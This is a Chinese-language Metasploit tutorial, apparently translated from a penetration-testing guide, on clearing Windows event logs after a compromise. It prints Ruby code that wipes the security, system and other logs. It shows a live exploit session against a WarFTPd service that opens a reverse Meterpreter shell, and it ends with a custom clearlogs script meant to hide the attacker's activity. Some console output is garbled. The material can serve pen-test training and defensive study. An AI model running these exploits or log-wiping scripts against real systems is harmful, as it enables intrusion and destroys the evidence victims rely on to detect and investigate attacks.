Metasploit 事件日志管理

有时最好不要记录你的活动。无论出于何种原因，您可能会发现需要清除Windows事件日志的情况。查看位于'scripts/meterpreter'中的winenum脚本的源代码，我们可以看到这个函数的工作方式。

def clrevtlgs()
	evtlogs = [
		'security',
		'system',
		'application',
		'directory service',
		'dns server',
		'file replication service'
	]
	print_status("Clearing Event Logs, this will leave and event 517")
	begin
		evtlogs.each do |evl|
			print_status("\tClearing the #{evl} Event Log")
			log = @client.sys.eventlog.open(evl)
			log.clear
			file_local_write(@dest,"Cleared the #{evl} Event Log")
		end
		print_status("All Event Logs have been cleared")
	rescue ::Exception => e
		print_status("Error clearing Event Log: #{e.class} #{e}")

	end
end

让我们来看一个需要清除事件日志的场景，但是我们将使用Meterpreter中的ruby解释器来动态清除日志，而不是使用预制脚本来为我们完成工作。首先，让我们看看我们的Windows '系统' 事件日志。

现在，让我们利用该系统并手动清除日志。我们将模拟winenum脚本中的命令。运行'log = client.sys.eventlog.open（'system'）'会为我们打开系统日志。

msf exploit(warftpd_165_user) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Connecting to FTP server 172.16.104.145:21...
[*] Connected to target FTP server.
[*] Trying target Windows 2000 SP0-SP4 English...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 2 opened (172.16.104.130:4444 -> 172.16.104.145:1246)

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>> log = client.sys.eventlog.open('system')
=> #>#:0xb6779424 @client=#>, #>, #

"windows/browser/facebook_extractiptc"=>#, "windows/antivirus/trendmicro_serverprotect_earthagent"=>#, "windows/browser/ie_iscomponentinstalled"=>#, "windows/exec/reverse_ord_tcp"=>#, "windows/http/apache_chunked"=>#, "windows/imap/novell_netmail_append"=>#

现在我们将看看我们是否可以通过运行'log.clear'来清除日志。

>> log.clear
=> #>#:0xb6779424 @client=#>,

/trendmicro_serverprotect_earthagent"=>#, "windows/browser/ie_iscomponentinstalled"=>#, "windows/exec/reverse_ord_tcp"=>#, "windows/http/apache_chunked"=>#, "windows/imap/novell_netmail_append"=>#

让我们看看它是否有效。

成功！我们现在可以更进一步，创建我们自己的清除事件日志的脚本。

# Clears Windows Event Logs


evtlogs = [
        'security',
        'system',
        'application',
        'directory service',
        'dns server',
        'file replication service'
        ]
print_line("Clearing Event Logs, this will leave an event 517")
evtlogs.each do |evl|
        print_status("Clearing the #{evl} Event Log")
        log = client.sys.eventlog.open(evl)
        log.clear
end
print_line("All Clear! You are a Ninja!")

在编写我们的脚本之后，我们将它放在/usr/share/metasploit-framework/scripts/meterpreter/中。然后，让我们重新开发系统，看看它是否有效。

msf exploit(warftpd_165_user) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Connecting to FTP server 172.16.104.145:21...
[*] Connected to target FTP server.
[*] Trying target Windows 2000 SP0-SP4 English...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (172.16.104.130:4444 -> 172.16.104.145:1253)

meterpreter > run clearlogs
Clearing Event Logs, this will leave an event 517
[*] Clearing the security Event Log
[*] Clearing the system Event Log
[*] Clearing the application Event Log
[*] Clearing the directory service Event Log
[*] Clearing the dns server Event Log
[*] Clearing the file replication service Event Log
All Clear! You are a Ninja!
meterpreter > exit

系统日志中剩下的唯一事件是预期的517。

这是Meterpreter的强大功能。除了我们从另一个脚本中取得的一些示例代码之外，没有太多背景，我们创建了一个有用的工具来帮助我们隐瞒我们的行为。